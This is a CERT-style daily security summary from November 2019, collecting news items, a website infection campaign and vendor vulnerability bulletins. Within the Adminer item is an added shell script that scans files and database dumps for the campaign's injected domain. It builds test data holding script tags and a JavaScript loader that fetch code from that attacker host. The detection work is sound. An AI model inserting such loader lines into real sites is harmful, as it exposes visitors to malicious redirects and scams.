Daily summary - 11.11.2019

End-of-Day report

Timeframe: Friday 08-11-2019 18:00 - Monday 11-11-2019 18:00
Handler: Robert Waldner
Co-Handler: n/a

News

DDoS attacks in Q3 2019

Statistically, Q3 2019 differs little from Q2. In terms of geographical distribution of attacks and targets, we saw a continuation of the now familiar trend of unexpected guests appearing, only to drop out the next quarter.

https://securelist.com/ddos-report-q3-2019/94958/


Vulnerable Versions of Adminer as a Universal Infection Vector

This past week, we've been monitoring a new wave of website infections mostly impacting WordPress and Magento websites. We found that hackers have been injecting scripts from scripts.trasnaltemyrecords[.]com into multiple files and database tables. This is still the same ongoing campaign that we've been following for the past few years, where site visitors are redirected to various kinds of scam landing pages, including tech support scams, fake lottery wins, and malicious [...]

https://blog.sucuri.net/2019/11/vulnerable-versions-of-adminer-as-a-universal-infection-vector.html
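Because the post says the attacker's script host is written both into files and into database tables, a clean-up has to look in both places. The following is an added example, not code from the Sucuri post or from the Adminer project: it checks a web root and a SQL dump for the host named above, scripts.trasnaltemyrecords[.]com, keeping the domain defanged in the script itself and restoring the dot only for matching. The WordPress-like tree and the dump built by make_sample_site are constructed demonstration data, and the file names, row contents and "talk.js" path are assumptions made for the example, not indicators from the post.

```shell
# Added example (not from the Sucuri post): locate a known injected script host
# in a web root and in a database dump. The sample site and dump are constructed
# for this demonstration; the IOC is the host named in the post.

DOMAIN='scripts.trasnaltemyrecords[.]com'

# "example[.]com" -> "example.com"
refang() {
    printf '%s' "$1" | sed 's/\[\.\]/./g'
}

# Print, one per line and sorted, every file under $1 that contains domain $2.
# -F matches the string literally, so the dots in the host are not wildcards.
scan_files() {
    grep -rlF -- "$(refang "$2")" "$1" 2>/dev/null | sort
}

# Count lines of SQL dump $1 that contain domain $2. mysqldump writes one INSERT
# row per line only with --skip-extended-insert; with the default multi-row
# INSERTs this counts affected statements, not rows. "|| true" keeps a count of
# 0 from failing the caller under set -e.
scan_dump() {
    grep -cF -- "$(refang "$2")" "$1" || true
}

# Build a constructed web root ($root/htdocs) and dump ($root/dump.sql) under a
# temp dir and print $root. Two files and one wp_posts row carry the injection.
make_sample_site() {
    root=$(mktemp -d)
    host=$(refang "$DOMAIN")
    web="$root/htdocs"
    mkdir -p "$web/wp-content/themes/demo" "$web/wp-includes"
    # Clean theme file: must not be reported.
    printf '<?php get_header(); ?>\n' > "$web/wp-content/themes/demo/index.php"
    # Injected tag appended to a PHP template (assumed file and path).
    printf '<?php get_footer(); ?><script src="https://%s/talk.js"></script>\n' "$host" \
        > "$web/wp-content/themes/demo/footer.php"
    # Injected loader appended to a core JavaScript file (assumed).
    printf 'var s=document.createElement("script");s.src="//%s/talk.js";document.head.appendChild(s);\n' "$host" \
        > "$web/wp-includes/jquery.js"
    # Dump with one clean row and one poisoned post row (constructed).
    cat > "$root/dump.sql" <<EOF
INSERT INTO wp_posts VALUES (1,'Hello','<p>Welcome</p>');
INSERT INTO wp_posts VALUES (2,'About','<script src="https://$host/talk.js"></script><p>About us</p>');
EOF
    printf '%s' "$root"
}

# Stand-alone run: build the sample, report both checks, clean up.
demo() {
    root=$(make_sample_site)
    echo "Files under htdocs referencing $DOMAIN:"
    scan_files "$root/htdocs" "$DOMAIN"
    echo "Dump lines referencing $DOMAIN: $(scan_dump "$root/dump.sql" "$DOMAIN")"
    rm -rf "$root"
}

demo
```

On a real site, point scan_files at the document root and scan_dump at a fresh mysqldump (or query the tables directly); a hit in wp_posts or wp_options means restoring files alone will not clean the site, which is the point the post makes about the campaign writing to database tables as well.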


Ring Video Doorbell Pro: Chatty IoT doorbell leaked Wi-Fi credentials

A doorbell that makes visitors visible and audible could have given attackers full Wi-Fi access without being noticed. Automatic updates have been distributed.

https://heise.de/-4583764


Muama Enence instant translator does not deliver what it promises

A device that instantly translates 32 languages and removes communication problems on holiday or on business sounds great at first! That is what UAB Ekomlita promises with the MUAMA Enence Instant Translator. But beware: important product information is sometimes withheld, there are serious problems with withdrawing from the purchase, and we have data-protection concerns!

https://www.watchlist-internet.at/news/sofortuebersetzer-von-muama-enence-haelt-nicht-was-er-verspricht/


Apple's Siri undermines e-mail encryption

Messages are stored locally in plain text under macOS - a fix is in progress according to Apple

https://www.derstandard.at/story/2000110928043/apples-siri-unterwandert-e-mail-verschluesselung

Vulnerabilities

Jira Service Desk Security Advisory 2019-11-06

CVE-2019-15003 - Authorization bypass allows information disclosure
CVE-2019-15004 - URL path traversal allows information disclosure

https://confluence.atlassian.com/jira/jira-service-desk-security-advisory-2019-11-06-979412717.html


UniFi Video Server Privilege Escalation From user to SYSTEM via unauthenticated command execution

The vulnerability, or feature depending on how you look at it, is the ability to execute commands using the evostream API interface that is exposed on localhost:7440.

https://hackerone.com/reports/544928


Security updates for Monday

Security updates have been issued by Debian (ampache, chromium, djvulibre, firefox-esr, gdal, and ruby-haml), Fedora (chromium, file, gd, hostapd, nspr, and rssh), openSUSE (bcm20702a1-firmware, firefox, gdal, libtomcrypt, php7, python-ecdsa, python3, samba, and thunderbird), SUSE (apache2-mod_auth_openidc, libssh2_org, and rsyslog), and Ubuntu (bash).

https://lwn.net/Articles/804325/


Security Bulletin: IBM QRadar SIEM is vulnerable to multiple Kernel vulnerabilities

https://www.ibm.com/blogs/psirt/security-bulletin-ibm-qradar-siem-is-vulnerable-to-multiple-kernel-vulnerabilities/


Security Bulletin: IBM RackSwitch firmware products are affected by TCP denial of service vulnerabilities

https://www.ibm.com/blogs/psirt/security-bulletin-ibm-rackswitch-firmware-products-are-affected-by-tcp-denial-of-service-vulnarabilities/


Security Bulletin: IBM Tivoli Netcool Impact is affected by an Apache Camel vulnerability (CVE-2019-0188)

https://www.ibm.com/blogs/psirt/security-bulletin-ibm-tivoli-netcool-impact-is-affected-by-an-apache-camel-vulnerability-cve-2019-0188/


Security Bulletin: Node.js lodash vulnerability affects IBM Spectrum Control (formerly Tivoli Storage Productivity Center) ( CVE-2019-10744)

https://www.ibm.com/blogs/psirt/security-bulletin-node-js-lodash-vulnerability-affects-ibm-spectrum-control-formerly-tivoli-storage-productivity-center-cve-2019-10744/


Security Bulletin: IBM Flex System Chassis Management Module (CMM) is affected by vulnerability in SQLite (CVE-2018-20346)

https://www.ibm.com/blogs/psirt/security-bulletin-ibm-flex-system-chassis-management-module-cmm-is-affected-by-vulnerability-in-sqlite-cve-2018-20346/


Security Bulletin: IBM QRadar SIEM is vulnerable to Jetty Vulnerabilities (CVE-2017-7656, CVE-2017-7657, CVE-2017-7658, CVE-2018-12536)

https://www.ibm.com/blogs/psirt/security-bulletin-ibm-qradar-siem-is-vulnerable-to-jetty-vulnerabilities-cve-2017-7656-cve-2017-7657-cve-2017-7658-cve-2018-12536/


Security Bulletin: IBM Tivoli Netcool Impact is affected by an Apache Camel vulnerability (CVE-2019-0194)

https://www.ibm.com/blogs/psirt/security-bulletin-ibm-tivoli-netcool-impact-is-affected-by-an-apache-camel-vulnerability-cve-2019-0194/


Security Bulletin: IBM QRadar SIEM is vulnerable to cross site scripting (XSS) (CVE-2019-4470)

https://www.ibm.com/blogs/psirt/security-bulletin-ibm-qradar-siem-is-vulnerable-to-cross-site-scripting-xss-cve-2019-4470/


Security Bulletin: Multiple vulnerabilities in Python affect IBM i

https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-in-python-affect-ibm-i/


Security Bulletin: IBM QRadar SIEM is vulnerable to Intel Microarchitectural Data Sampling (MDS) Vulnerabilities

https://www.ibm.com/blogs/psirt/security-bulletin-ibm-qradar-siem-is-vulnerable-to-intel-microarchitectural-data-sampling-mds-vulnerabilites/